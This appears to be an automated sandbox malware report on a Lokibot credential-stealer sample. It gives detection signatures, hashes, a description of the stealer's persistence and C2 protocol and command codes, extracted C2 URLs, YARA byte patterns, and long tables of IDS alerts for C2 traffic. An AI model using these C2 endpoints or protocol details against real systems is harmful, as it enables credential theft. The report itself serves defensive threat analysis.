Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Overview

General Information

Sample name:1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
Analysis ID:1541921
MD5:3fb350f4356f42b51a523b6fa8cbccf3
SHA1:5f24115b8e734d11deea653df8b32c506c31f4b1
SHA256:6f01d6bd7b69d6e61d55898a1a9f1c228bf644ddb03c7506670dd2e6d9bfc967
Tags:base64-decodedexeuser-abuse_ch
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Lokibot
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
SourceRuleDescriptionAuthorStrings
1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeJoeSecurity_LokibotYara detected LokibotJoe Security
    1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeWindows_Trojan_Lokibot_1f885282unknownunknown
        • 0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
        1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeWindows_Trojan_Lokibot_0f421617unknownunknown
        • 0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
        Click to see the 3 entries
        SourceRuleDescriptionAuthorStrings
        dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
          SourceRuleDescriptionAuthorStrings
          00000000.00000000.1682431268.0000000000401000.00000020.00000001.01000000.00000003.sdmpWindows_Trojan_Lokibot_0f421617unknownunknown
          • 0x43bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
          00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmpWindows_Trojan_Lokibot_0f421617unknownunknown
          • 0x43bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
          00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
            00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 10 entries
                SourceRuleDescriptionAuthorStrings
                0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                  0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
                    0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
                      • 0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
                      0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
                      • 0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
                      Click to see the 11 entries
                      No Sigma rule has matched
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-25T10:20:02.412267+020020243121A Network Trojan was detected192.168.2.44973094.156.177.22080TCP
                      2024-10-25T10:20:04.020146+020020243121A Network Trojan was detected192.168.2.44973194.156.177.22080TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-25T10:20:01.424022+020020253811Malware Command and Control Activity Detected192.168.2.44973094.156.177.22080TCP
                      2024-10-25T10:20:03.047948+020020253811Malware Command and Control Activity Detected192.168.2.44973194.156.177.22080TCP
                      2024-10-25T10:20:04.092936+020020253811Malware Command and Control Activity Detected192.168.2.44973294.156.177.22080TCP
                      2024-10-25T10:20:05.231108+020020253811Malware Command and Control Activity Detected192.168.2.44973394.156.177.22080TCP
                      2024-10-25T10:20:06.375575+020020253811Malware Command and Control Activity Detected192.168.2.44973494.156.177.22080TCP
                      2024-10-25T10:20:07.485394+020020253811Malware Command and Control Activity Detected192.168.2.44973594.156.177.22080TCP
                      2024-10-25T10:20:09.597188+020020253811Malware Command and Control Activity Detected192.168.2.44973694.156.177.22080TCP
                      2024-10-25T10:20:10.715160+020020253811Malware Command and Control Activity Detected192.168.2.44973794.156.177.22080TCP
                      2024-10-25T10:20:12.310127+020020253811Malware Command and Control Activity Detected192.168.2.44973894.156.177.22080TCP
                      2024-10-25T10:20:13.452612+020020253811Malware Command and Control Activity Detected192.168.2.44973994.156.177.22080TCP
                      2024-10-25T10:20:14.593029+020020253811Malware Command and Control Activity Detected192.168.2.44974094.156.177.22080TCP
                      2024-10-25T10:20:15.751617+020020253811Malware Command and Control Activity Detected192.168.2.44974194.156.177.22080TCP
                      2024-10-25T10:20:16.872789+020020253811Malware Command and Control Activity Detected192.168.2.44974494.156.177.22080TCP
                      2024-10-25T10:20:18.205156+020020253811Malware Command and Control Activity Detected192.168.2.44974794.156.177.22080TCP
                      2024-10-25T10:20:19.310464+020020253811Malware Command and Control Activity Detected192.168.2.44974994.156.177.22080TCP
                      2024-10-25T10:20:21.380407+020020253811Malware Command and Control Activity Detected192.168.2.44975194.156.177.22080TCP
                      2024-10-25T10:20:22.549457+020020253811Malware Command and Control Activity Detected192.168.2.44975294.156.177.22080TCP
                      2024-10-25T10:20:23.684073+020020253811Malware Command and Control Activity Detected192.168.2.44975394.156.177.22080TCP
                      2024-10-25T10:20:24.816660+020020253811Malware Command and Control Activity Detected192.168.2.44975494.156.177.22080TCP
                      2024-10-25T10:20:25.965151+020020253811Malware Command and Control Activity Detected192.168.2.44975594.156.177.22080TCP
                      2024-10-25T10:20:27.717963+020020253811Malware Command and Control Activity Detected192.168.2.44975694.156.177.22080TCP
                      2024-10-25T10:20:29.863609+020020253811Malware Command and Control Activity Detected192.168.2.44975794.156.177.22080TCP
                      2024-10-25T10:20:30.997406+020020253811Malware Command and Control Activity Detected192.168.2.44975894.156.177.22080TCP
                      2024-10-25T10:20:32.176322+020020253811Malware Command and Control Activity Detected192.168.2.44975994.156.177.22080TCP
                      2024-10-25T10:20:33.687799+020020253811Malware Command and Control Activity Detected192.168.2.44976094.156.177.22080TCP
                      2024-10-25T10:20:34.810261+020020253811Malware Command and Control Activity Detected192.168.2.44976194.156.177.22080TCP
                      2024-10-25T10:20:35.916782+020020253811Malware Command and Control Activity Detected192.168.2.44976294.156.177.22080TCP
                      2024-10-25T10:20:37.046303+020020253811Malware Command and Control Activity Detected192.168.2.44976394.156.177.22080TCP
                      2024-10-25T10:20:38.200499+020020253811Malware Command and Control Activity Detected192.168.2.44976494.156.177.22080TCP
                      2024-10-25T10:20:39.822243+020020253811Malware Command and Control Activity Detected192.168.2.44976594.156.177.22080TCP
                      2024-10-25T10:20:40.950583+020020253811Malware Command and Control Activity Detected192.168.2.44976694.156.177.22080TCP
                      2024-10-25T10:20:42.434571+020020253811Malware Command and Control Activity Detected192.168.2.44976794.156.177.22080TCP
                      2024-10-25T10:20:43.576012+020020253811Malware Command and Control Activity Detected192.168.2.44976894.156.177.22080TCP
                      2024-10-25T10:20:44.753726+020020253811Malware Command and Control Activity Detected192.168.2.44976994.156.177.22080TCP
                      2024-10-25T10:20:45.967783+020020253811Malware Command and Control Activity Detected192.168.2.44977094.156.177.22080TCP
                      2024-10-25T10:20:47.090625+020020253811Malware Command and Control Activity Detected192.168.2.44977194.156.177.22080TCP
                      2024-10-25T10:20:48.628754+020020253811Malware Command and Control Activity Detected192.168.2.44977294.156.177.22080TCP
                      2024-10-25T10:20:49.450869+020020253811Malware Command and Control Activity Detected192.168.2.44977394.156.177.22080TCP
                      2024-10-25T10:20:50.632516+020020253811Malware Command and Control Activity Detected192.168.2.44977494.156.177.22080TCP
                      2024-10-25T10:20:52.029076+020020253811Malware Command and Control Activity Detected192.168.2.44977594.156.177.22080TCP
                      2024-10-25T10:20:53.168380+020020253811Malware Command and Control Activity Detected192.168.2.44977694.156.177.22080TCP
                      2024-10-25T10:20:54.305428+020020253811Malware Command and Control Activity Detected192.168.2.44977794.156.177.22080TCP
                      2024-10-25T10:20:55.471024+020020253811Malware Command and Control Activity Detected192.168.2.44977994.156.177.22080TCP
                      2024-10-25T10:20:56.594180+020020253811Malware Command and Control Activity Detected192.168.2.44978094.156.177.22080TCP
                      2024-10-25T10:20:58.015959+020020253811Malware Command and Control Activity Detected192.168.2.44978294.156.177.22080TCP
                      2024-10-25T10:20:59.156243+020020253811Malware Command and Control Activity Detected192.168.2.44979394.156.177.22080TCP
                      2024-10-25T10:21:00.311298+020020253811Malware Command and Control Activity Detected192.168.2.44979994.156.177.22080TCP
                      2024-10-25T10:21:01.419074+020020253811Malware Command and Control Activity Detected192.168.2.44980594.156.177.22080TCP
                      2024-10-25T10:21:02.575992+020020253811Malware Command and Control Activity Detected192.168.2.44981194.156.177.22080TCP
                      2024-10-25T10:21:04.300437+020020253811Malware Command and Control Activity Detected192.168.2.44982294.156.177.22080TCP
                      2024-10-25T10:21:05.450685+020020253811Malware Command and Control Activity Detected192.168.2.44982894.156.177.22080TCP
                      2024-10-25T10:21:06.702578+020020253811Malware Command and Control Activity Detected192.168.2.44983694.156.177.22080TCP
                      2024-10-25T10:21:07.823534+020020253811Malware Command and Control Activity Detected192.168.2.44984294.156.177.22080TCP
                      2024-10-25T10:21:08.970566+020020253811Malware Command and Control Activity Detected192.168.2.44985194.156.177.22080TCP
                      2024-10-25T10:21:10.210497+020020253811Malware Command and Control Activity Detected192.168.2.44985894.156.177.22080TCP
                      2024-10-25T10:21:11.347066+020020253811Malware Command and Control Activity Detected192.168.2.44986494.156.177.22080TCP
                      2024-10-25T10:21:12.693350+020020253811Malware Command and Control Activity Detected192.168.2.44987194.156.177.22080TCP
                      2024-10-25T10:21:13.812456+020020253811Malware Command and Control Activity Detected192.168.2.44987794.156.177.22080TCP
                      2024-10-25T10:21:14.957762+020020253811Malware Command and Control Activity Detected192.168.2.44988394.156.177.22080TCP
                      2024-10-25T10:21:16.552285+020020253811Malware Command and Control Activity Detected192.168.2.44989494.156.177.22080TCP
                      2024-10-25T10:21:17.694981+020020253811Malware Command and Control Activity Detected192.168.2.44990094.156.177.22080TCP
                      2024-10-25T10:21:19.204894+020020253811Malware Command and Control Activity Detected192.168.2.44991094.156.177.22080TCP
                      2024-10-25T10:21:20.326057+020020253811Malware Command and Control Activity Detected192.168.2.44991794.156.177.22080TCP
                      2024-10-25T10:21:21.441410+020020253811Malware Command and Control Activity Detected192.168.2.44992494.156.177.22080TCP
                      2024-10-25T10:21:22.907366+020020253811Malware Command and Control Activity Detected192.168.2.44993494.156.177.22080TCP
                      2024-10-25T10:21:24.073735+020020253811Malware Command and Control Activity Detected192.168.2.44994094.156.177.22080TCP
                      2024-10-25T10:21:25.575978+020020253811Malware Command and Control Activity Detected192.168.2.44994794.156.177.22080TCP
                      2024-10-25T10:21:26.705064+020020253811Malware Command and Control Activity Detected192.168.2.44995494.156.177.22080TCP
                      2024-10-25T10:21:27.827107+020020253811Malware Command and Control Activity Detected192.168.2.44996394.156.177.22080TCP
                      2024-10-25T10:21:28.952302+020020253811Malware Command and Control Activity Detected192.168.2.44996994.156.177.22080TCP
                      2024-10-25T10:21:30.120093+020020253811Malware Command and Control Activity Detected192.168.2.44997594.156.177.22080TCP
                      2024-10-25T10:21:31.244679+020020253811Malware Command and Control Activity Detected192.168.2.44998594.156.177.22080TCP
                      2024-10-25T10:21:32.352236+020020253811Malware Command and Control Activity Detected192.168.2.44999194.156.177.22080TCP
                      2024-10-25T10:21:33.496323+020020253811Malware Command and Control Activity Detected192.168.2.44999894.156.177.22080TCP
                      2024-10-25T10:21:34.650472+020020253811Malware Command and Control Activity Detected192.168.2.45000594.156.177.22080TCP
                      2024-10-25T10:21:35.782292+020020253811Malware Command and Control Activity Detected192.168.2.45001494.156.177.22080TCP
                      2024-10-25T10:21:36.922599+020020253811Malware Command and Control Activity Detected192.168.2.45002194.156.177.22080TCP
                      2024-10-25T10:21:38.071599+020020253811Malware Command and Control Activity Detected192.168.2.45002794.156.177.22080TCP
                      2024-10-25T10:21:39.204843+020020253811Malware Command and Control Activity Detected192.168.2.45003394.156.177.22080TCP
                      2024-10-25T10:21:40.499810+020020253811Malware Command and Control Activity Detected192.168.2.45003994.156.177.22080TCP
                      2024-10-25T10:21:41.653914+020020253811Malware Command and Control Activity Detected192.168.2.45005094.156.177.22080TCP
                      2024-10-25T10:21:42.775266+020020253811Malware Command and Control Activity Detected192.168.2.45005694.156.177.22080TCP
                      2024-10-25T10:21:43.937769+020020253811Malware Command and Control Activity Detected192.168.2.45006294.156.177.22080TCP
                      2024-10-25T10:21:45.077227+020020253811Malware Command and Control Activity Detected192.168.2.45007394.156.177.22080TCP
                      2024-10-25T10:21:46.202323+020020253811Malware Command and Control Activity Detected192.168.2.45007894.156.177.22080TCP
                      2024-10-25T10:21:47.377458+020020253811Malware Command and Control Activity Detected192.168.2.45008594.156.177.22080TCP
                      2024-10-25T10:21:48.502508+020020253811Malware Command and Control Activity Detected192.168.2.45008894.156.177.22080TCP
                      2024-10-25T10:21:49.659829+020020253811Malware Command and Control Activity Detected192.168.2.45008994.156.177.22080TCP
                      2024-10-25T10:21:51.498324+020020253811Malware Command and Control Activity Detected192.168.2.45009094.156.177.22080TCP
                      2024-10-25T10:21:52.518212+020020253811Malware Command and Control Activity Detected192.168.2.45009194.156.177.22080TCP
                      2024-10-25T10:21:53.649173+020020253811Malware Command and Control Activity Detected192.168.2.45009294.156.177.22080TCP
                      2024-10-25T10:21:54.809440+020020253811Malware Command and Control Activity Detected192.168.2.45009394.156.177.22080TCP
                      2024-10-25T10:21:55.924734+020020253811Malware Command and Control Activity Detected192.168.2.45009494.156.177.22080TCP
                      2024-10-25T10:21:57.172837+020020253811Malware Command and Control Activity Detected192.168.2.45009594.156.177.22080TCP
                      2024-10-25T10:21:58.339192+020020253811Malware Command and Control Activity Detected192.168.2.45009694.156.177.22080TCP
                      2024-10-25T10:21:59.527535+020020253811Malware Command and Control Activity Detected192.168.2.45009794.156.177.22080TCP
                      2024-10-25T10:22:01.017571+020020253811Malware Command and Control Activity Detected192.168.2.45009894.156.177.22080TCP
                      2024-10-25T10:22:02.183819+020020253811Malware Command and Control Activity Detected192.168.2.45009994.156.177.22080TCP
                      2024-10-25T10:22:04.446102+020020253811Malware Command and Control Activity Detected192.168.2.45010094.156.177.22080TCP
                      2024-10-25T10:22:05.576112+020020253811Malware Command and Control Activity Detected192.168.2.45010194.156.177.22080TCP
                      2024-10-25T10:22:06.709690+020020253811Malware Command and Control Activity Detected192.168.2.45010294.156.177.22080TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-25T10:20:05.071273+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449732TCP
                      2024-10-25T10:20:06.226237+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449733TCP
                      2024-10-25T10:20:07.334473+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449734TCP
                      2024-10-25T10:20:09.432485+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449735TCP
                      2024-10-25T10:20:10.560448+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449736TCP
                      2024-10-25T10:20:11.719389+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449737TCP
                      2024-10-25T10:20:13.299728+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449738TCP
                      2024-10-25T10:20:14.406009+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449739TCP
                      2024-10-25T10:20:15.575285+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449740TCP
                      2024-10-25T10:20:16.722910+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449741TCP
                      2024-10-25T10:20:17.838629+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449744TCP
                      2024-10-25T10:20:19.157444+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449747TCP
                      2024-10-25T10:20:21.112566+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449749TCP
                      2024-10-25T10:20:22.355060+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449751TCP
                      2024-10-25T10:20:23.520665+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449752TCP
                      2024-10-25T10:20:24.657497+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449753TCP
                      2024-10-25T10:20:25.792079+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449754TCP
                      2024-10-25T10:20:26.959979+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449755TCP
                      2024-10-25T10:20:28.701325+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449756TCP
                      2024-10-25T10:20:30.845454+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449757TCP
                      2024-10-25T10:20:32.016207+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449758TCP
                      2024-10-25T10:20:33.145709+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449759TCP
                      2024-10-25T10:20:34.655827+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449760TCP
                      2024-10-25T10:20:35.772022+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449761TCP
                      2024-10-25T10:20:36.891188+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449762TCP
                      2024-10-25T10:20:38.041870+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449763TCP
                      2024-10-25T10:20:39.188082+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449764TCP
                      2024-10-25T10:20:40.802577+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449765TCP
                      2024-10-25T10:20:42.081150+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449766TCP
                      2024-10-25T10:20:43.419600+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449767TCP
                      2024-10-25T10:20:44.573607+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449768TCP
                      2024-10-25T10:20:45.954002+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449769TCP
                      2024-10-25T10:20:46.940955+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449770TCP
                      2024-10-25T10:20:48.048668+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449771TCP
                      2024-10-25T10:20:49.297262+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449772TCP
                      2024-10-25T10:20:50.450430+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449773TCP
                      2024-10-25T10:20:51.609517+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449774TCP
                      2024-10-25T10:20:53.022733+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449775TCP
                      2024-10-25T10:20:54.139132+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449776TCP
                      2024-10-25T10:20:55.287327+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449777TCP
                      2024-10-25T10:20:56.437553+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449779TCP
                      2024-10-25T10:20:57.600381+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449780TCP
                      2024-10-25T10:20:59.008492+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449782TCP
                      2024-10-25T10:21:00.135806+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449793TCP
                      2024-10-25T10:21:01.275786+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449799TCP
                      2024-10-25T10:21:02.418624+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449805TCP
                      2024-10-25T10:21:03.555551+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449811TCP
                      2024-10-25T10:21:05.295989+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449822TCP
                      2024-10-25T10:21:06.449512+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449828TCP
                      2024-10-25T10:21:07.676728+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449836TCP
                      2024-10-25T10:21:08.802409+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449842TCP
                      2024-10-25T10:21:09.934486+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449851TCP
                      2024-10-25T10:21:11.192386+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449858TCP
                      2024-10-25T10:21:12.316954+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449864TCP
                      2024-10-25T10:21:13.652804+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449871TCP
                      2024-10-25T10:21:14.792765+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449877TCP
                      2024-10-25T10:21:15.930332+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449883TCP
                      2024-10-25T10:21:17.529729+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449894TCP
                      2024-10-25T10:21:18.684574+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449900TCP
                      2024-10-25T10:21:20.175088+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449910TCP
                      2024-10-25T10:21:21.284965+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449917TCP
                      2024-10-25T10:21:22.437264+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449924TCP
                      2024-10-25T10:21:23.924135+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449934TCP
                      2024-10-25T10:21:25.066881+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449940TCP
                      2024-10-25T10:21:26.551185+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449947TCP
                      2024-10-25T10:21:27.670578+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449954TCP
                      2024-10-25T10:21:28.801641+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449963TCP
                      2024-10-25T10:21:29.973087+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449969TCP
                      2024-10-25T10:21:31.099993+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449975TCP
                      2024-10-25T10:21:32.212011+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449985TCP
                      2024-10-25T10:21:33.340436+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449991TCP
                      2024-10-25T10:21:34.478912+020020254831A Network Trojan was detected94.156.177.22080192.168.2.449998TCP
                      2024-10-25T10:21:35.629820+020020254831A Network Trojan was detected94.156.177.22080192.168.2.450005TCP
                      2024-10-25T10:21:36.772729+020020254831A Network Trojan was detected94.156.177.22080192.168.2.450014TCP
                      2024-10-25T10:21:37.895860+020020254831A Network Trojan was detected94.156.177.22080192.168.2.450021TCP
                      2024-10-25T10:21:39.046534+020020254831A Network Trojan was detected94.156.177.22080192.168.2.450027TCP
                      2024-10-25T10:21:40.350403+020020254831A Network Trojan was detected94.156.177.22080192.168.2.450033TCP
                      2024-10-25T10:21:41.496560+020020254831A Network Trojan was detected94.156.177.22080192.168.2.450039TCP
                      2024-10-25T10:21:42.635640+020020254831A Network Trojan was detected94.156.177.22080192.168.2.450050TCP
                      2024-10-25T10:21:43.777737+020020254831A Network Trojan was detected94.156.177.22080192.168.2.450056TCP
                      2024-10-25T10:21:44.927929+020020254831A Network Trojan was detected94.156.177.22080192.168.2.450062TCP
                      2024-10-25T10:21:46.053961+020020254831A Network Trojan was detected94.156.177.22080192.168.2.450073TCP
                      2024-10-25T10:21:47.216255+020020254831A Network Trojan was detected94.156.177.22080192.168.2.450078TCP
                      2024-10-25T10:21:48.349012+020020254831A Network Trojan was detected94.156.177.22080192.168.2.450085TCP
                      2024-10-25T10:21:49.494903+020020254831A Network Trojan was detected94.156.177.22080192.168.2.450088TCP
                      2024-10-25T10:21:50.633330+020020254831A Network Trojan was detected94.156.177.22080192.168.2.450089TCP
                      2024-10-25T10:21:52.362707+020020254831A Network Trojan was detected94.156.177.22080192.168.2.450090TCP
                      2024-10-25T10:21:53.481146+020020254831A Network Trojan was detected94.156.177.22080192.168.2.450091TCP
                      2024-10-25T10:21:54.634280+020020254831A Network Trojan was detected94.156.177.22080192.168.2.450092TCP
                      2024-10-25T10:21:55.761443+020020254831A Network Trojan was detected94.156.177.22080192.168.2.450093TCP
